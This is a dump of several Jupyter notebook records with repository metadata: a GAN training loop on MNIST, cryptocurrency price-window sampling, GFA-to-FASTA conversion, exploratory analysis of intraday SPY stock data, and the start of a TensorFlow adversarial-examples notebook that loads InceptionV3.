D(Real) # shape : (batch_size, (0 to 1))\n Disc_fake = D(G(noise)) # shape : (batch_size, (0 to 1))\n \n # crossentropy loss for real images\n Disc_real_loss = F.binary_cross_entropy(Disc_real, one_labels)\n # crossentropy loss for fake images\n Disc_fake_loss = F.binary_cross_entropy(Disc_fake, zero_labels)\n # total loss for discriminator\n Disc_loss = Disc_real_loss + Disc_fake_loss\n \n # backpropagation\n D_opt.zero_grad()\n Disc_loss.backward()\n D_opt.step()\n \n # forward propagation for generator\n # First, we use some noise to generate a random image.\n # the image is then fed to discriminator, so that it provides a value between 0 and 1.\n # 
because we are training discriminator before the generator so the discrimitor will always be one step ahead.\n # this advantage of discriminator helps discriminator give better probability value for the fake image.\n # the returned value is then used to figure out how well the generator has produced the fake image\n # so the generator will use a crossentropy loss to figure out what is the difference between the labels for fake image and actal images\n \n # noise, input to generator\n noise = torch.randn(batch_size, Z_dim).to(device)\n Disc_fake = D(G(noise))\n Gen_loss = F.binary_cross_entropy(Disc_fake, one_labels)\n \n # backpropagration\n G_opt.zero_grad()\n Gen_loss.backward()\n G_opt.step()\n \n # we are adding overall loss for discriminator and generator for all the iterations in an epoch\n G_loss_run += Gen_loss.item()\n D_loss_run += Disc_loss.item()\n \n if epoch % 2 == 0:\n print(\"Epoch : {}, Gen_loss : {}, Disc_loss : {}\".format(epoch+1, G_loss_run/batch_idx+1, D_loss_run/batch_idx+1))\n \n # we dont want to compute gradient for this step, therefore .detach()\n sample_fake = G(noise).detach()\n sample_fake = sample_fake.view(sample_fake.shape[0], 1, 28, 28)\n sample_real = data[0]\n \n # making grids for tensorboard\n img_grid_fake = torchvision.utils.make_grid(sample_fake, normalize = True)\n img_grid_real = torchvision.utils.make_grid(sample_real, normalize = True)\n \n writer_fake.add_image(\n \"MNIST Fake Images\", img_grid_fake, global_step = step\n )\n \n writer_real.add_image(\n \"MNIST Real Images\", img_grid_real, global_step = step\n )\n \n step += 1\n \n if notebook == True:\n #print(sample_fake.shape, sample_real.shape)\n plot_images(sample_fake)\n plot_images(sample_real)\n ", "Epoch : 1, Gen_loss : 4.277582804955693, Disc_loss : 1.243619375160459\ntorch.Size([32, 1, 28, 28]) torch.Size([32, 1, 28, 28])\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e7309eb1349809292545c3e13e4b3ab8f09cbf70
7,532
ipynb
Jupyter Notebook
2_PastSampler.ipynb
psmishra7/CryptocurrencyPrediction
96f85ba45d1acbd531ad86f7f9ba32b9acd3ddaf
[ "MIT" ]
null
null
null
2_PastSampler.ipynb
psmishra7/CryptocurrencyPrediction
96f85ba45d1acbd531ad86f7f9ba32b9acd3ddaf
[ "MIT" ]
null
null
null
2_PastSampler.ipynb
psmishra7/CryptocurrencyPrediction
96f85ba45d1acbd531ad86f7f9ba32b9acd3ddaf
[ "MIT" ]
null
null
null
31.647059
85
0.519915
[ [ [ "\nimport numpy as np\nimport pandas as pd\n \nclass PastSampler:\n '''\n Forms training samples for predicting future values from past value\n '''\n \n def __init__(self, N, K, sliding_window = True):\n '''\n Predict K future sample using N previous samples\n '''\n self.K = K\n self.N = N\n self.sliding_window = sliding_window\n \n def transform(self, A):\n M = self.N + self.K #Number of samples per row (sample + target)\n #indexes\n if self.sliding_window:\n I = np.arange(M) + np.arange(A.shape[0] - M + 1).reshape(-1, 1)\n else:\n if A.shape[0]%M == 0:\n I = np.arange(M)+np.arange(0,A.shape[0],M).reshape(-1,1)\n \n else:\n I = np.arange(M)+np.arange(0,A.shape[0] -M,M).reshape(-1,1)\n \n B = A[I].reshape(-1, M * A.shape[1], A.shape[2])\n ci = self.N * A.shape[1] #Number of features per sample\n return B[:, :ci], B[:, ci:] #Sample matrix, Target matrix\n\n#data file path\ndfp = 'data/bitcoin2015to2017.csv'\n\n#Columns of price data to use\ncolumns = ['Close']\ndf = pd.read_csv(dfp)\ntime_stamps = df['Timestamp']\ndf = df.loc[:,columns]\noriginal_df = pd.read_csv(dfp).loc[:,columns]", "_____no_output_____" ], [ "\nfile_name='bitcoin2015to2017_close.h5'\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\n# normalization\nfor c in columns:\n df[c] = scaler.fit_transform(df[c].values.reshape(-1,1))\n \n#Features are input sample dimensions(channels)\nA = np.array(df)[:,None,:]\noriginal_A = np.array(original_df)[:,None,:]\ntime_stamps = np.array(time_stamps)[:,None,None]\n\n#Make samples of temporal sequences of pricing data (channel)\nNPS, NFS = 256, 16 #Number of past and future samples\nps = PastSampler(NPS, NFS, sliding_window=False)\nB, Y = ps.transform(A)\ninput_times, output_times = ps.transform(time_stamps)\noriginal_B, original_Y = ps.transform(original_A)\n\nimport h5py\nwith h5py.File(file_name, 'w') as f:\n f.create_dataset(\"inputs\", data = B)\n f.create_dataset('outputs', data = Y)\n f.create_dataset(\"input_times\", data = 
input_times)\n f.create_dataset('output_times', data = output_times)\n f.create_dataset(\"original_datas\", data=np.array(original_df))\n f.create_dataset('original_inputs',data=original_B)\n f.create_dataset('original_outputs',data=original_Y)", "_____no_output_____" ] ], [ [ "import numpy as np\nimport pandas as pd\n \nclass PastSampler:\n '''\n Forms training samples for predicting future values from past value\n '''\n \n def __init__(self, N, K, sliding_window = True):\n '''\n Predict K future sample using N previous samples\n '''\n self.K = K\n self.N = N\n self.sliding_window = sliding_window\n \n def transform(self, A):\n M = self.N + self.K #Number of samples per row (sample + target)\n #indexes\n if self.sliding_window:\n I = np.arange(M) + np.arange(A.shape[0] - M + 1).reshape(-1, 1)\n else:\n if A.shape[0]%M == 0:\n I = np.arange(M)+np.arange(0,A.shape[0],M).reshape(-1,1)\n \n else:\n I = np.arange(M)+np.arange(0,A.shape[0] -M,M).reshape(-1,1)\n \n B = A[I].reshape(-1, M * A.shape[1], A.shape[2])\n ci = self.N * A.shape[1] #Number of features per sample\n return B[:, :ci], B[:, ci:] #Sample matrix, Target matrix\n\n#data file path\ndfp = 'data/4coins_17apr2021.csv'\n\n#Columns of price data to use\ncolumns = ['close']\n# df = pd.read_csv(dfp).dropna().tail(1000000)\ndf = pd.read_csv(dfp)\ntime_stamps = df['date']\ndf = df.loc[:,columns]\n# original_df = pd.read_csv(dfp).dropna().tail(1000000).loc[:,columns]\noriginal_df = pd.read_csv(dfp).loc[:,columns]", "_____no_output_____" ], [ "file_name='bitcoin2015to2017_close.h5'\n\ndfp = 'data/bitcoin2015to2017.csv'", "_____no_output_____" ], [ "from sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\n# normalization\nfor c in columns:\n df[c] = scaler.fit_transform(df[c].values.reshape(-1,1))\n", "_____no_output_____" ], [ "#%%Features are channels\nA = np.array(df)[:,None,:]\noriginal_A = np.array(original_df)[:,None,:]\ntime_stamps = np.array(time_stamps)[:,None,None]\n#%%Make samples of 
temporal sequences of pricing data (channel)\nNPS, NFS = 256, 16 #Number of past and future samples\nps = PastSampler(NPS, NFS, sliding_window=False)\nB, Y = ps.transform(A)\ninput_times, output_times = ps.transform(time_stamps)\noriginal_B, original_Y = ps.transform(original_A)", "_____no_output_____" ], [ "import h5py\nwith h5py.File(file_name, 'w') as f:\n f.create_dataset(\"inputs\", data = B)\n f.create_dataset('outputs', data = Y)\n f.create_dataset(\"input_times\", data = input_times)\n f.create_dataset('output_times', data = output_times)\n f.create_dataset(\"original_datas\", data=np.array(original_df))\n f.create_dataset('original_inputs',data=original_B)\n f.create_dataset('original_outputs',data=original_Y)\n# f.create_dataset('original_times', data=time_stamps)", "_____no_output_____" ], [ "B.shape", "_____no_output_____" ] ] ]
[ "code", "raw" ]
[ [ "code", "code" ], [ "raw", "raw", "raw", "raw", "raw", "raw" ] ]
e730af3d45d9a37fd4655b175ec3e24a8c132c19
2,184
ipynb
Jupyter Notebook
jupyter/gfa_to_fasta.ipynb
linsalrob/EdwardsLab
3d4eef1dda61c31ce8163d94d86f186275a6e4a4
[ "MIT" ]
30
2015-01-25T16:22:51.000Z
2022-01-20T15:56:47.000Z
jupyter/gfa_to_fasta.ipynb
linsalrob/EdwardsLab
3d4eef1dda61c31ce8163d94d86f186275a6e4a4
[ "MIT" ]
2
2020-04-13T15:00:37.000Z
2020-09-23T12:35:59.000Z
jupyter/gfa_to_fasta.ipynb
linsalrob/EdwardsLab
3d4eef1dda61c31ce8163d94d86f186275a6e4a4
[ "MIT" ]
24
2015-04-17T00:52:05.000Z
2021-11-26T17:50:01.000Z
21.203883
76
0.46337
[ [ [ "import os\nimport sys", "_____no_output_____" ], [ "fname = 'C:\\\\Users\\edwa0468\\Downloads\\ED287_S7_assembly.gfa'\noname = 'C:\\\\Users\\edwa0468\\Downloads\\ED287_S7_assembly.fasta'\nwith open(fname, 'r') as f:\n with open(oname, 'w') as out:\n for l in f:\n p = l.strip().split(\"\\t\")\n if p[0] == \"S\":\n out.write(f\">seq_{p[1]}\\n{p[2]}\\n\")\n print(f\"seq_{p[1]}\\t{len(p[2])}\")", "seq_1\t1991367\nseq_2\t1917636\nseq_3\t1566043\nseq_4\t36676\nseq_5\t2938\nseq_6\t1342\nseq_7\t761\nseq_8\t588\nseq_9\t354\nseq_10\t316\nseq_11\t208\nseq_12\t202\nseq_13\t189\nseq_14\t149\nseq_15\t148\nseq_16\t129\nseq_17\t123\nseq_18\t121\nseq_19\t118\nseq_20\t108\nseq_21\t52\nseq_22\t51\nseq_23\t42\nseq_24\t39\nseq_25\t39\nseq_26\t36\nseq_27\t35\nseq_28\t34\nseq_29\t24\nseq_30\t20\nseq_31\t17\nseq_32\t14\nseq_33\t12\nseq_34\t10\nseq_35\t8\nseq_36\t2\nseq_37\t1\n" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
e730b3af146d9ca3a632987ebcfe7e8e5a0372ab
503,521
ipynb
Jupyter Notebook
00_Code/03_ExploratoryDataAnalysis.ipynb
bvarnam/StockPrediction
ce639d892d44d853d37ef889176bb9da1cce90a4
[ "MIT" ]
1
2022-01-07T22:12:35.000Z
2022-01-07T22:12:35.000Z
00_Code/03_ExploratoryDataAnalysis.ipynb
bvarnam/StockPrediction
ce639d892d44d853d37ef889176bb9da1cce90a4
[ "MIT" ]
null
null
null
00_Code/03_ExploratoryDataAnalysis.ipynb
bvarnam/StockPrediction
ce639d892d44d853d37ef889176bb9da1cce90a4
[ "MIT" ]
null
null
null
414.761944
112,072
0.926746
[ [ [ "# Intraday Trading via Day Trading Techniques & Indicators\n---\n\n### Data collected via AlphaVantage free API using extended intraday data. \n> https://www.alphavantage.co/documentation/\n\n---", "_____no_output_____" ], [ "# 03 - Exploratory Data Analysis", "_____no_output_____" ], [ "### Library Imports", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n%matplotlib inline\nplt.style.use('fivethirtyeight')\n\nfrom pandas.plotting import autocorrelation_plot\nfrom statsmodels.graphics.tsaplots import plot_acf\nfrom statsmodels.graphics.tsaplots import plot_pacf\nfrom statsmodels.tsa.seasonal import seasonal_decompose\n\nfrom statsmodels.tsa.stattools import adfuller\n# Code written by Joseph Nelson.\ndef interpret_dftest(dftest):\n dfoutput = pd.Series(dftest[0:2], index=['Test Statistic','p-value'])\n return dfoutput", "_____no_output_____" ] ], [ [ "# Read in Filtered Dataset", "_____no_output_____" ] ], [ [ "df = pd.read_csv('../01_Data/extended_intraday_SPY_1min_filtered.csv')\ndf.set_index(pd.DatetimeIndex(df['time']), inplace=True)\ndf.drop(columns = ['time'], inplace = True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ] ], [ [ "# Feature Exploration", "_____no_output_____" ], [ "Let's first look at our most important feature, 'close' price.", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(18,9))\nplt.plot(df['close']);", "_____no_output_____" ] ], [ [ "**We see the large drop from COVID in early 2020, but overall nothing that would upset our models.**\n\n---\n**Is our data stationary?**\n\nTo answer this question, we apply the Augmented Dickey-Fuller Test and the accompanying function written by Joseph Nelson.", "_____no_output_____" ] ], [ [ "interpret_dftest(adfuller(df['close']))", "_____no_output_____" ] ], [ [ ">With a p value of .92, our data is most definitely NOT stationary. 
For an ARIMA model, we need our data to be stationary.\n\n**To achieve Stationarity, we apply the .diff() function to observe the changes rather than prices.**", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(18,9))\nplt.plot(df['close'].diff());", "_____no_output_____" ], [ "interpret_dftest(adfuller(df['close'].diff().dropna()))", "_____no_output_____" ] ], [ [ ">With a p value of 0, our data is stationary.", "_____no_output_____" ] ], [ [ "df['close_first_diff'] = df['close'].diff()\ndf.head()", "_____no_output_____" ] ], [ [ "To avoid any issues created through our diff function, we will remove null values from our dataset.", "_____no_output_____" ] ], [ [ "df.shape", "_____no_output_____" ], [ "df.dropna(inplace=True)\ndf.shape", "_____no_output_____" ] ], [ [ "As expected, this only removed the first row due to the null value created from our diff function.", "_____no_output_____" ], [ "**Does our data have seasonality?**", "_____no_output_____" ] ], [ [ "decomp = seasonal_decompose(df['close'], period=1)\n\nwith plt.rc_context():\n plt.rc(\"figure\", figsize=(18,9))\n # Plot the decomposed time series.\n decomp.plot();", "_____no_output_____" ] ], [ [ "> Difficult to tell from this visual alone. We do not appear to have significant seasonality, but let's continue to analyze.", "_____no_output_____" ] ], [ [ "autocorrelation_plot(df['close']);", "_____no_output_____" ], [ "plot_acf(df['close'], lags=452);", "_____no_output_____" ], [ "plot_pacf(df['close'], lags=452);", "_____no_output_____" ] ], [ [ "**These are difficult to interpret. 
Because we have such a large amount of data on 1minute intervals, its difficult to visualize a useful correlation tool.**\n\n**We are focusing on intraday data, however, so let's try picking a random day and testing correlation inside of a day.**", "_____no_output_____" ] ], [ [ "test = df.query(\"time >= '2019-10-28' and time < '2019-10-29'\")\ntest.shape", "_____no_output_____" ] ], [ [ "We see that a typical day consists of 450 minute intervals, or about 7.5 hours. When considering that we wanted our time frame to be 9:00am to 4:30pm, we again see the 7.5 hours. So we know this was a correct split for a single day.", "_____no_output_____" ] ], [ [ "df.shape", "_____no_output_____" ], [ "df.shape[0] / 450", "_____no_output_____" ], [ "decomp = seasonal_decompose(test['close'], period=1)\n\nwith plt.rc_context():\n plt.rc(\"figure\", figsize=(18,9))\n # Plot the decomposed time series.\n decomp.plot();", "_____no_output_____" ], [ "autocorrelation_plot(test['close']);", "_____no_output_____" ], [ "plot_acf(test['close'], lags=448);", "_____no_output_____" ], [ "plot_pacf(test['close'], lags=223);", "_____no_output_____" ] ], [ [ ">These results are much easier to interpret. We see there is not significant correlation between close prices beyond the initial few lags, which is to be expected.", "_____no_output_____" ], [ "# Target Variable\n\n**Our target variable is split into 3 columns.**\n1. 'target' shows us the % move in 1 minute (already multiplied by 100)\n2. 'target_binary_class' tells us if it went up or down.\n3. 
'target_multi_class' adds another dimension to the binary class column by including a class for if the price is relatively flat.", "_____no_output_____" ] ], [ [ "df['target'].describe()", "_____no_output_____" ] ], [ [ "**Our mean move is only 0.000095%, even after removing most of the pre-market and after hours data.**\n\n**However, our standard deviation is 0.056% which quickly incorporates most of our values.**\n- **3 standard deviations from our mean of about 0 would be +/- 0.168**\n---\nThis is described better visually:", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(18,9))\ndf['target'].hist(bins=1000)\nplt.xlim(-0.2,0.2)\nplt.ylabel('Occurances')\nplt.xlabel('Price Movements in 1 Minute')\nplt.title('Distribution of Target Variable');", "_____no_output_____" ] ], [ [ "> We seem to have a very normally distributed target variable with mean of about 0.\n\n**Incorporating what we know about the S&P500, specifically the ticker SPY, we know that the stock price is very stable and we see that described here by very small movements from minute to minute.**", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e730b5e82f15793b36ba19465f94fe3f9721e358
431,265
ipynb
Jupyter Notebook
anish_athalye/adversarial-examples/adversarial_tf2_v1.ipynb
phunc20/individuals
d5233ead8de726bbff2ae67d7622405caefad1ac
[ "MIT" ]
null
null
null
anish_athalye/adversarial-examples/adversarial_tf2_v1.ipynb
phunc20/individuals
d5233ead8de726bbff2ae67d7622405caefad1ac
[ "MIT" ]
null
null
null
anish_athalye/adversarial-examples/adversarial_tf2_v1.ipynb
phunc20/individuals
d5233ead8de726bbff2ae67d7622405caefad1ac
[ "MIT" ]
null
null
null
140.021104
250,660
0.81733
[ [ [ "# Setup\nBecause we switch to `tf2`, instead of using `tf.slim`, we will just use `tf.keras` for the inception model weights.", "_____no_output_____" ] ], [ [ "import tensorflow as tf\ntf.__version__", "_____no_output_____" ], [ "import tensorflow.keras as keras\nkeras.__version__", "_____no_output_____" ], [ "inception_model = keras.applications.inception_v3.InceptionV3()", "_____no_output_____" ], [ "inception_model.summary()", "Model: \"inception_v3\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) [(None, 299, 299, 3) 0 \n__________________________________________________________________________________________________\nconv2d (Conv2D) (None, 149, 149, 32) 864 input_1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization (BatchNorma (None, 149, 149, 32) 96 conv2d[0][0] \n__________________________________________________________________________________________________\nactivation (Activation) (None, 149, 149, 32) 0 batch_normalization[0][0] \n__________________________________________________________________________________________________\nconv2d_1 (Conv2D) (None, 147, 147, 32) 9216 activation[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_1 (BatchNor (None, 147, 147, 32) 96 conv2d_1[0][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 147, 147, 32) 0 batch_normalization_1[0][0] \n__________________________________________________________________________________________________\nconv2d_2 (Conv2D) (None, 147, 147, 64) 18432 activation_1[0][0] 
\n__________________________________________________________________________________________________\nbatch_normalization_2 (BatchNor (None, 147, 147, 64) 192 conv2d_2[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 147, 147, 64) 0 batch_normalization_2[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 73, 73, 64) 0 activation_2[0][0] \n__________________________________________________________________________________________________\nconv2d_3 (Conv2D) (None, 73, 73, 80) 5120 max_pooling2d[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_3 (BatchNor (None, 73, 73, 80) 240 conv2d_3[0][0] \n__________________________________________________________________________________________________\nactivation_3 (Activation) (None, 73, 73, 80) 0 batch_normalization_3[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 71, 71, 192) 138240 activation_3[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_4 (BatchNor (None, 71, 71, 192) 576 conv2d_4[0][0] \n__________________________________________________________________________________________________\nactivation_4 (Activation) (None, 71, 71, 192) 0 batch_normalization_4[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_1 (MaxPooling2D) (None, 35, 35, 192) 0 activation_4[0][0] \n__________________________________________________________________________________________________\nconv2d_8 (Conv2D) (None, 35, 35, 64) 12288 max_pooling2d_1[0][0] 
\n__________________________________________________________________________________________________\nbatch_normalization_8 (BatchNor (None, 35, 35, 64) 192 conv2d_8[0][0] \n__________________________________________________________________________________________________\nactivation_8 (Activation) (None, 35, 35, 64) 0 batch_normalization_8[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 35, 35, 48) 9216 max_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_9 (Conv2D) (None, 35, 35, 96) 55296 activation_8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_6 (BatchNor (None, 35, 35, 48) 144 conv2d_6[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_9 (BatchNor (None, 35, 35, 96) 288 conv2d_9[0][0] \n__________________________________________________________________________________________________\nactivation_6 (Activation) (None, 35, 35, 48) 0 batch_normalization_6[0][0] \n__________________________________________________________________________________________________\nactivation_9 (Activation) (None, 35, 35, 96) 0 batch_normalization_9[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d (AveragePooli (None, 35, 35, 192) 0 max_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 35, 35, 64) 12288 max_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, 35, 35, 64) 76800 activation_6[0][0] \n__________________________________________________________________________________________________\nconv2d_10 
(Conv2D) (None, 35, 35, 96) 82944 activation_9[0][0] \n__________________________________________________________________________________________________\nconv2d_11 (Conv2D) (None, 35, 35, 32) 6144 average_pooling2d[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_5 (BatchNor (None, 35, 35, 64) 192 conv2d_5[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_7 (BatchNor (None, 35, 35, 64) 192 conv2d_7[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_10 (BatchNo (None, 35, 35, 96) 288 conv2d_10[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_11 (BatchNo (None, 35, 35, 32) 96 conv2d_11[0][0] \n__________________________________________________________________________________________________\nactivation_5 (Activation) (None, 35, 35, 64) 0 batch_normalization_5[0][0] \n__________________________________________________________________________________________________\nactivation_7 (Activation) (None, 35, 35, 64) 0 batch_normalization_7[0][0] \n__________________________________________________________________________________________________\nactivation_10 (Activation) (None, 35, 35, 96) 0 batch_normalization_10[0][0] \n__________________________________________________________________________________________________\nactivation_11 (Activation) (None, 35, 35, 32) 0 batch_normalization_11[0][0] \n__________________________________________________________________________________________________\nmixed0 (Concatenate) (None, 35, 35, 256) 0 activation_5[0][0] \n activation_7[0][0] \n activation_10[0][0] \n activation_11[0][0] \n__________________________________________________________________________________________________\nconv2d_15 (Conv2D) (None, 35, 35, 64) 
16384 mixed0[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_15 (BatchNo (None, 35, 35, 64) 192 conv2d_15[0][0] \n__________________________________________________________________________________________________\nactivation_15 (Activation) (None, 35, 35, 64) 0 batch_normalization_15[0][0] \n__________________________________________________________________________________________________\nconv2d_13 (Conv2D) (None, 35, 35, 48) 12288 mixed0[0][0] \n__________________________________________________________________________________________________\nconv2d_16 (Conv2D) (None, 35, 35, 96) 55296 activation_15[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_13 (BatchNo (None, 35, 35, 48) 144 conv2d_13[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_16 (BatchNo (None, 35, 35, 96) 288 conv2d_16[0][0] \n__________________________________________________________________________________________________\nactivation_13 (Activation) (None, 35, 35, 48) 0 batch_normalization_13[0][0] \n__________________________________________________________________________________________________\nactivation_16 (Activation) (None, 35, 35, 96) 0 batch_normalization_16[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_1 (AveragePoo (None, 35, 35, 256) 0 mixed0[0][0] \n__________________________________________________________________________________________________\nconv2d_12 (Conv2D) (None, 35, 35, 64) 16384 mixed0[0][0] \n__________________________________________________________________________________________________\nconv2d_14 (Conv2D) (None, 35, 35, 64) 76800 activation_13[0][0] 
\n__________________________________________________________________________________________________\nconv2d_17 (Conv2D) (None, 35, 35, 96) 82944 activation_16[0][0] \n__________________________________________________________________________________________________\nconv2d_18 (Conv2D) (None, 35, 35, 64) 16384 average_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_12 (BatchNo (None, 35, 35, 64) 192 conv2d_12[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_14 (BatchNo (None, 35, 35, 64) 192 conv2d_14[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_17 (BatchNo (None, 35, 35, 96) 288 conv2d_17[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_18 (BatchNo (None, 35, 35, 64) 192 conv2d_18[0][0] \n__________________________________________________________________________________________________\nactivation_12 (Activation) (None, 35, 35, 64) 0 batch_normalization_12[0][0] \n__________________________________________________________________________________________________\nactivation_14 (Activation) (None, 35, 35, 64) 0 batch_normalization_14[0][0] \n__________________________________________________________________________________________________\nactivation_17 (Activation) (None, 35, 35, 96) 0 batch_normalization_17[0][0] \n__________________________________________________________________________________________________\nactivation_18 (Activation) (None, 35, 35, 64) 0 batch_normalization_18[0][0] \n__________________________________________________________________________________________________\nmixed1 (Concatenate) (None, 35, 35, 288) 0 activation_12[0][0] \n activation_14[0][0] \n activation_17[0][0] \n activation_18[0][0] 
\n__________________________________________________________________________________________________\nconv2d_22 (Conv2D) (None, 35, 35, 64) 18432 mixed1[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_22 (BatchNo (None, 35, 35, 64) 192 conv2d_22[0][0] \n__________________________________________________________________________________________________\nactivation_22 (Activation) (None, 35, 35, 64) 0 batch_normalization_22[0][0] \n__________________________________________________________________________________________________\nconv2d_20 (Conv2D) (None, 35, 35, 48) 13824 mixed1[0][0] \n__________________________________________________________________________________________________\nconv2d_23 (Conv2D) (None, 35, 35, 96) 55296 activation_22[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_20 (BatchNo (None, 35, 35, 48) 144 conv2d_20[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_23 (BatchNo (None, 35, 35, 96) 288 conv2d_23[0][0] \n__________________________________________________________________________________________________\nactivation_20 (Activation) (None, 35, 35, 48) 0 batch_normalization_20[0][0] \n__________________________________________________________________________________________________\nactivation_23 (Activation) (None, 35, 35, 96) 0 batch_normalization_23[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_2 (AveragePoo (None, 35, 35, 288) 0 mixed1[0][0] \n__________________________________________________________________________________________________\nconv2d_19 (Conv2D) (None, 35, 35, 64) 18432 mixed1[0][0] \n__________________________________________________________________________________________________\nconv2d_21 (Conv2D) (None, 35, 
35, 64) 76800 activation_20[0][0] \n__________________________________________________________________________________________________\nconv2d_24 (Conv2D) (None, 35, 35, 96) 82944 activation_23[0][0] \n__________________________________________________________________________________________________\nconv2d_25 (Conv2D) (None, 35, 35, 64) 18432 average_pooling2d_2[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_19 (BatchNo (None, 35, 35, 64) 192 conv2d_19[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_21 (BatchNo (None, 35, 35, 64) 192 conv2d_21[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_24 (BatchNo (None, 35, 35, 96) 288 conv2d_24[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_25 (BatchNo (None, 35, 35, 64) 192 conv2d_25[0][0] \n__________________________________________________________________________________________________\nactivation_19 (Activation) (None, 35, 35, 64) 0 batch_normalization_19[0][0] \n__________________________________________________________________________________________________\nactivation_21 (Activation) (None, 35, 35, 64) 0 batch_normalization_21[0][0] \n__________________________________________________________________________________________________\nactivation_24 (Activation) (None, 35, 35, 96) 0 batch_normalization_24[0][0] \n__________________________________________________________________________________________________\nactivation_25 (Activation) (None, 35, 35, 64) 0 batch_normalization_25[0][0] \n__________________________________________________________________________________________________\nmixed2 (Concatenate) (None, 35, 35, 288) 0 activation_19[0][0] \n activation_21[0][0] \n activation_24[0][0] \n 
activation_25[0][0] \n__________________________________________________________________________________________________\nconv2d_27 (Conv2D) (None, 35, 35, 64) 18432 mixed2[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_27 (BatchNo (None, 35, 35, 64) 192 conv2d_27[0][0] \n__________________________________________________________________________________________________\nactivation_27 (Activation) (None, 35, 35, 64) 0 batch_normalization_27[0][0] \n__________________________________________________________________________________________________\nconv2d_28 (Conv2D) (None, 35, 35, 96) 55296 activation_27[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_28 (BatchNo (None, 35, 35, 96) 288 conv2d_28[0][0] \n__________________________________________________________________________________________________\nactivation_28 (Activation) (None, 35, 35, 96) 0 batch_normalization_28[0][0] \n__________________________________________________________________________________________________\nconv2d_26 (Conv2D) (None, 17, 17, 384) 995328 mixed2[0][0] \n__________________________________________________________________________________________________\nconv2d_29 (Conv2D) (None, 17, 17, 96) 82944 activation_28[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_26 (BatchNo (None, 17, 17, 384) 1152 conv2d_26[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_29 (BatchNo (None, 17, 17, 96) 288 conv2d_29[0][0] \n__________________________________________________________________________________________________\nactivation_26 (Activation) (None, 17, 17, 384) 0 batch_normalization_26[0][0] 
\n__________________________________________________________________________________________________\nactivation_29 (Activation) (None, 17, 17, 96) 0 batch_normalization_29[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 17, 17, 288) 0 mixed2[0][0] \n__________________________________________________________________________________________________\nmixed3 (Concatenate) (None, 17, 17, 768) 0 activation_26[0][0] \n activation_29[0][0] \n max_pooling2d_2[0][0] \n__________________________________________________________________________________________________\nconv2d_34 (Conv2D) (None, 17, 17, 128) 98304 mixed3[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_34 (BatchNo (None, 17, 17, 128) 384 conv2d_34[0][0] \n__________________________________________________________________________________________________\nactivation_34 (Activation) (None, 17, 17, 128) 0 batch_normalization_34[0][0] \n__________________________________________________________________________________________________\nconv2d_35 (Conv2D) (None, 17, 17, 128) 114688 activation_34[0][0] 